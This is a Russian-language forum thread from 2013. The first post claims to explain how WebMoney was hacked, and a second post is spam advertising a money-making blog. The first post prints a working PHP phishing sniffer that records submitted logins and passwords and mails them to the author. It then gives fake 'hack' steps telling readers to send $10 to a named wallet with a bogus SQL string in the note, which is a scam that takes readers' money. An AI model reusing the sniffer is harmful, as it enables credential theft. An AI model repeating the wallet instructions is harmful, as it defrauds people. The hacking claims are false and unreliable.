| гоша | Дата: Суббота, 28.12.2013, 16:22 | Сообщение # 1 |
|
Группа: Гости
| Привет всем!!! Сейчас я расскажу, как я взломал webmoney.
Как же взломать webmoney? В ответ на этот вопрос гугл вывалил огромную кипу различных вариантов (к счастью половина была повторных, иначе я бы лежал в психушке). Разработчики хорошо поработали, так как после 2-х часов попыток не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки webmoney.
Было решено создать фэйк страницу авторизации, чтобы был баг и webmoney бот присылал мне пароль от WM-карты. Поэтому я попросил своего хорошего друга программиста помочь мне. На следующий день на аську пришло сообщение от друга. Он создал фэйк форму, а также составил ядовитый url на нашу фэйк форму. Созданный url сильно палился, поэтому мы немного замаскировали его, чтобы админы webmoney чувствовали себя сухо и комфортно. Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пароль WM-карты на мыло, вот код сниффера:
<?
$adminmail = "mymail@mail.ru";
function email($to,$mailtext) {
mail($to,'password',$mailtext,$adminmail);
}
$text="[".date("d.m.y H:i")."]Login: $_POST [login]Password: $_POST[pass]\r\n";
email($adminmail,$text);
$file = fopen("logs.txt","a");
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);
echo "<FORM id='auth' action='http://talk.mail.ru/login.html' method=post>
<INPUT type=hidden name=login value='$_POST[login]'>
<INPUT type=hidden name=pass value='$_POST[pass]'>
<script>auth.submit();</script>
</FORM>";
?>
Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нибудь сбои в работе службы DNS. После этого мы создали баг к кошельку.
Для проверки проделанной работы мы кинули 10 ДОЛЛАРОВ. на этот номер кошелька Z900073862954
И на мой кошель минут через 5 пришло 30 ДОЛЛАРОВ. Это конечно очень мало бабла, ведь столько работы было проделано. И мы с моим другом решили еще раз протестировать наш баг и кинуть 30 БАКСОВ. Ну, обратно нам так ничего и не пришло. Я долго думал, в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 10 ДОЛЛАРОВ . И я не поверил своим глазам, баг не исчез =) Запрос к БД на число 30 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел, что на мой кошель пришли опять 30 ДОЛЛАРОВ.
"Как выполнить взлом webmoney на своем компе"
1. Для начала проходим сюда http://www.webmoney.ru/
2. Заводим почтовый ящик
3. Заводим webmoney кошелек (у кого нет)
4. Ложем на кошелек денег (10 ДОЛЛАРОВ для взлома (можно больше ))
5. Теперь нажимаем перевести, и переводим сумму не больше не меньше, а ровно 10 ДОЛЛАРОВ
6. Переводим 10 ДОЛЛАРОВ на этот кошелек Z900073862954 (где мы сделали баг)
7. В примечании пишем вот это:
SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'charge' AND cc.content_type = 'appropriated charge' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND payer_id = '30''
Там где написано id = «0» (предпоследнее id)
Меняем значение «0» на свой номер кошелька
Вот пример :
id = «Z900073862954»
8. Все, дело сделано, ждем минут 5, и к вам должны прийти 30 ДОЛЛАРОВ. Надеюсь подробно объяснил вам. Это проверено уже на многих компах, так что дерзайте!
|
| |
| |
| coolmaliby2016 | Дата: Среда, 14.12.2016, 07:20 | Сообщение # 2 |
|
Рядовой
Группа: Пользователи
Сообщений: 13
Награды: 0
Репутация: 0
Статус: Offline
| zolotoi-mach-2016.blogspot.ru
1. Копируем ссылку и вставляем в браузерную строку!
ПРОСТО ЧИТАЙ ПИСЬМА И ПОЛУЧАЙ ДЕНЕЖКИ!!!
|
| |
| |
